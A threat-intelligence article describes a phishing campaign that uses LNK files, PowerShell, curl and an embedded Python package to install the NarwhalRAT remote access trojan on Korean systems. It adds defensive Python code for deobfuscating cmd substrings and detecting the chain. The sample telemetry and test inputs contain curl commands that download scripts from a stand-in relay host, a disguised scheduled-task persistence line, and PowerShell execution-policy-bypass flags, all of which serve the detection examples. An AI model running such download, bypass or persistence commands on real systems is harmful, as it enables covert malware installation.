A new and sophisticated malware campaign has been identified, targeting users in South Korea through a deceptive and intricate method. The attack uses seemingly harmless shortcut files, leveraging built-in Windows utilities and a Python-based payload to install a remote access trojan known as NarwhalRAT. This operation is particularly notable for its ability to blend seamlessly with typical system activities, making detection difficult.
Deceptive Spear Phishing Tactics
The attack is initiated via spear phishing emails, masquerading as urgent security alerts from the ‘Microsoft Account Team’. Recipients are warned about suspicious activity related to one-time passwords and are urged to open an attached document, which is actually a ZIP archive containing a malicious LNK shortcut file.
Security experts from the Genians Security Center, in a report shared with Cyber Security News, highlighted the malware’s resemblance to a Python-based backdoor operation documented in May 2026. Dubbed NarwhalRAT, the malware appears to impersonate the popular South Korean browser, Naver Whale, as indicated by the string ‘naverwhale’ found within its code.
Targeted Attack on Korean Systems
Several of NarwhalRAT’s behaviors point to Korean users as its intended targets. The malware uses a working directory named ‘naverwhale’ and sets the Hidden and System file attributes to conceal its presence. It also handles KakaoTalk-related identifiers separately, suggesting deliberate targeting of Korean applications.
The attackers employ a dual command-and-control (C2) infrastructure: a Korean relay server, and the pCloud API used as a dead-drop resolver from which the malware retrieves its current C2 address. This setup lets them change the C2 address without modifying the malware itself and hides the lookup within ordinary web traffic, complicating detection efforts.
Advanced Loader and Execution Techniques
Opening the malicious LNK file triggers a complex infection sequence. The shortcut uses CMD environment variable substring substitution to obscure the real commands, assembling strings such as ‘powershell’ at runtime so that they never appear in the file for static analysis to find.
Following deobfuscation, it launches PowerShell with the execution policy bypassed and uses a copied curl.exe to retrieve two files from the relay server. The first, a decoy HWP document, is displayed to the user, while the second, a batch script, quietly continues the installation.
This approach, known as living off the land, uses native tools to evade detection. The batch script downloads an official Python embedded package, disguising the malware’s activities as a normal software installation. The final payload, disguised as a Windows security catalog, is actually a Python bytecode backdoor loader.
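The substring trick described above works because cmd.exe expands `%VAR:~start,length%` at runtime, so a shortcut can carve the letters of ‘PowerShell’ out of an innocuous environment variable. The following is an added example, not code from the report or the campaign: a small Python expander that resolves the substring and `%VAR:old=new%` replacement forms against a constructed environment, then searches the expanded command line for indicators that the raw LNK arguments never contain. The environment values and the obfuscated argument string are both constructed for this example.

```python
import re
from typing import Dict, List, Optional

# Constructed environment for the example: variable names and the COMSPEC /
# PSModulePath layouts follow Windows defaults; the host itself is fictional.
SAMPLE_ENV: Dict[str, str] = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "PSModulePath": r"C:\Program Files\WindowsPowerShell\Modules",
    "PUBLIC": r"C:\Users\Public",
}

# Constructed LNK-style argument string (not the campaign's real command):
# every interesting word is carved out of an environment variable at runtime.
SAMPLE_OBFUSCATED = (
    '%PSModulePath:~24,10% -ep bypass -w hidden -c '
    '"%COMSPEC:~-7,3% /c echo %PUBLIC:~-6%"'
)

# Matches %NAME%, %NAME:~start[,length]% and %NAME:old=new%
_TOKEN = re.compile(
    r"%(?P<name>[^%:]+)"
    r"(?::~(?P<start>-?\d+)(?:,(?P<length>-?\d+))?"
    r"|:(?P<old>[^%=]+)=(?P<new>[^%]*))?%"
)


def _substring(value: str, start: int, length: Optional[int]) -> str:
    """Apply cmd.exe substring semantics: negative start counts from the end,
    negative length is an offset from the end, missing length means 'to end'."""
    n = len(value)
    begin = max(n + start, 0) if start < 0 else min(start, n)
    if length is None:
        end = n
    elif length < 0:
        end = n + length
    else:
        end = begin + length
    return value[begin:end] if end > begin else ""


def expand(cmdline: str, env: Dict[str, str]) -> str:
    """Expand cmd-style variable references in one pass."""
    lookup = {k.upper(): v for k, v in env.items()}  # cmd names are case-insensitive

    def repl(m: "re.Match[str]") -> str:
        value = lookup.get(m.group("name").upper())
        if value is None:
            return m.group(0)  # keep unresolved references visible to the analyst
        if m.group("start") is not None:
            length = m.group("length")
            return _substring(value, int(m.group("start")),
                              None if length is None else int(length))
        if m.group("old") is not None:
            # %VAR:old=new% replaces every occurrence, case-insensitively
            return re.sub(re.escape(m.group("old")), lambda _: m.group("new"),
                          value, flags=re.IGNORECASE)
        return value

    return _TOKEN.sub(repl, cmdline)


# Substrings worth flagging once the command line has been expanded.
INDICATORS = ("powershell", "-ep bypass", "-executionpolicy bypass",
              "-w hidden", "curl", "schtasks")


def suspicious_indicators(cmdline: str, env: Dict[str, str]) -> List[str]:
    """Return the indicators present in the *expanded* command line."""
    expanded = expand(cmdline, env).lower()
    return [token for token in INDICATORS if token in expanded]


if __name__ == "__main__":
    print(expand(SAMPLE_OBFUSCATED, SAMPLE_ENV))
    print(suspicious_indicators(SAMPLE_OBFUSCATED, SAMPLE_ENV))
```

Run against the real environment of the analysis host only if that host mirrors the victim's variables; otherwise feed it the values recovered from the victim, since the substring offsets depend on the exact variable contents.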
NarwhalRAT’s Capabilities and Challenges
Once operational, NarwhalRAT functions as a full-featured remote access trojan, capable of detecting and evading sandbox environments such as VMware and VirtualBox. Its command system, built on more than 30 command prefixes, allows remote execution of screen capture, keylogging, and more.
For persistence, the malware registers a scheduled task that runs at one-minute intervals under a name mimicking legitimate Microsoft tasks, to avoid attention from administrators. Security researchers emphasize the need for enhanced EDR policies to identify attacks that chain LNK files and PowerShell in this way.
To mitigate the risk, organizations should implement behavioral rules to detect unusual scheduled task creation and monitor unexpected use of curl.exe and Python processes lacking visible console windows.
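The behavioral rules suggested above can be expressed directly over process-creation telemetry. The following is an added example, not code from the report or from any EDR product: three rules in Python evaluated against constructed Sysmon-style process events. It flags `schtasks /create` with a one-minute trigger or a `\Microsoft\` task name created from a script host, a `curl.exe` that does not live in the system directory (or a system `curl.exe` driven by a script host to write a download), and `python.exe`/`pythonw.exe` running outside a normal installation directory (`pythonw.exe` is the console-less interpreter). All paths, task names and hostnames in the sample events are constructed; the `naverwhale` directory name is the one the report attributes to the malware.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    image: str
    parent_image: str
    command_line: str


SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
SYSTEM_CURL = {r"c:\windows\system32\curl.exe", r"c:\windows\syswow64\curl.exe"}
PYTHON_INSTALL_DIRS = (r"c:\program files\python", r"\appdata\local\programs\python")


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_scheduled_task(ev: ProcEvent) -> Optional[str]:
    """schtasks /create with a one-minute trigger, or a \\Microsoft\\ task name
    registered by a script host rather than an installer or the console."""
    if _name(ev.image) != "schtasks.exe":
        return None
    cl = ev.command_line.lower()
    if "/create" not in cl:
        return None
    one_minute = re.search(r"/sc\s+minute", cl) and re.search(r"/mo\s+1\b", cl)
    tn = re.search(r'/tn\s+"?([^"\s]+)', cl)
    mimics_microsoft = tn is not None and tn.group(1).startswith("\\microsoft\\")
    if one_minute:
        return "schtasks_one_minute_interval"
    if mimics_microsoft and _name(ev.parent_image) in SCRIPT_HOSTS:
        return "schtasks_microsoft_lookalike_from_script_host"
    return None


def rule_curl(ev: ProcEvent) -> Optional[str]:
    """A copied curl.exe anywhere, or the system curl.exe used by a script host
    to write a file to disk."""
    if _name(ev.image) != "curl.exe":
        return None
    if ev.image.lower() not in SYSTEM_CURL:
        return "curl_copied_binary"
    if (_name(ev.parent_image) in SCRIPT_HOSTS
            and re.search(r"(?:^|\s)(?:-o|--output)\s", ev.command_line.lower())):
        return "curl_scripted_download"
    return None


def rule_python(ev: ProcEvent) -> Optional[str]:
    """Python interpreter (an embedded package, for instance) outside an install dir."""
    name = _name(ev.image)
    if name not in ("python.exe", "pythonw.exe"):
        return None
    if any(d in ev.image.lower() for d in PYTHON_INSTALL_DIRS):
        return None
    return "pythonw_outside_install_dir" if name == "pythonw.exe" else "python_outside_install_dir"


RULES = (rule_scheduled_task, rule_curl, rule_python)


def evaluate(ev: ProcEvent) -> List[str]:
    return [hit for rule in RULES if (hit := rule(ev))]


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map event index to the rule names it triggered (events with no hits are omitted)."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


# Constructed sample telemetry: two benign events, four modelled on the chain described above.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\Windows\explorer.exe",
              r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\Tools\backup.exe"'),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
              r'schtasks /create /sc minute /mo 1 /tn "\Microsoft\Windows\ExampleUpdateTask" '
              r'/tr "C:\Users\Public\naverwhale\pythonw.exe C:\Users\Public\naverwhale\loader.cat"'),
    ProcEvent(r"C:\Users\Public\curl.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"curl.exe -s -o C:\Users\Public\doc.hwp http://relay.example/doc"),
    ProcEvent(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
              r"curl.exe -s -o C:\Users\Public\setup.bat http://relay.example/setup"),
    ProcEvent(r"C:\Users\Public\naverwhale\pythonw.exe", r"C:\Windows\System32\svchost.exe",
              r"pythonw.exe loader.cat"),
    ProcEvent(r"C:\Program Files\Python312\python.exe", r"C:\Program Files\Microsoft VS Code\Code.exe",
              r"python.exe -m pytest"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The `SYSTEM_CURL` and `PYTHON_INSTALL_DIRS` allow-lists are the part to tune per environment; the rules are deliberately narrow so that a developer running Python from Program Files or an administrator creating a daily task produces no hit.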
